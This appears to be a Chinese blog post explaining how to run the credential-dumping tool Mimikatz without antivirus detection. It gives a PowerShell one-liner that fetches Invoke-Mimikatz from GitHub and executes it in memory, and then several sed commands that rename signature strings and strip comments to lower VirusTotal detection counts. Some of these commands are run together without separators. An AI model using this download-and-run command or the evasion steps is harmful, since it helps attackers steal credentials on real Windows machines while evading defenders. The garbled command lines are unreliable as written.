如何繞過殺軟執行 Mimikatz?
曾幾何時,你是否也像我一樣希望執行 Mimikatz 的時候不會被殺毒軟體查殺。但現實卻是,當我從 PowerSploit 上下載 PowerShell 腳本 "Invoke-Mimikatz" 後,無論是否將腳本存儲到硬碟當中都會立馬被 Windows Defender 標記為了惡意軟體。
powershell "IEX (New-Object Net.WebClient).DownloadString(https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1);Invoke-Mimikatz"
隨後將 "Invoke-Mimikatz" 腳本上傳到 VirusTotal,我們會發現共有 19 個殺毒軟體會將其標記為惡意軟體。
但是呢,我們也知道殺毒軟體的檢測通常都只是簡單基於查找文件中的敏感辭彙,所以在修改部分敏感辭彙後就可以繞過一些殺毒軟體了,例如將文件名替換為 "Invoke-Mimidogz" 後,就只有 8 個殺毒軟體會在檢測到。sed -i -e s/Invoke-Mimikatz/Invoke-Mimidogz/g Invoke-Mimikatz.ps1
sed -i -e /<#/,/#>/c\ Invoke-Mimikatz.ps1sed -i -e s/^[[:space:]]*#.*$//g Invoke-Mimikatz.ps1
一下就只剩 4 個殺毒軟體還會在報了。那麼讓我們繼續改進,好像殺毒軟體不太喜歡 "DumpCreds" 這個詞,那麼改成 "DumpCred" 怎麼樣呢?
sed -i -e s/DumpCreds/DumpCred/g Invoke-Mimikatz.ps1
sed -i -e s/Invoke-Mimikatz/Invoke-Mimidogz/g Invoke-Mimikatz.ps1sed -i -e /<#/,/#>/c\ Invoke-Mimikatz.ps1sed -i -e s/^[[:space:]]*#.*$//g Invoke-Mimikatz.ps1sed -i -e s/DumpCreds/DumpCred/g Invoke-Mimikatz.ps1sed -i -e s/ArgumentPtr/NotTodayPal/g Invoke-Mimikatz.ps1sed -i -e s/CallDllMainSC1/ThisIsNotTheStringYouAreLookingFor/g Invoke-Mimikatz.ps1sed -i -e "s/-Win32Functions $Win32Functions$/-Win32Functions $Win32Functions #-/g" Invoke-Mimikatz.ps1
註:本文參考來源於blackhillsinfosec
推薦閱讀:
※「零日」計算機病毒撼動現實世界
※如何看待 WannaCrypt0r 還沒有結束?
※QQ里520Just Love 盡情愛的假紅包到底有沒有病毒,求告知。?
※熊貓燒香當年有多兇殘?
※電腦開機啟動就出現這樣的問題Error C:Googlegoogleupdate.a3x,?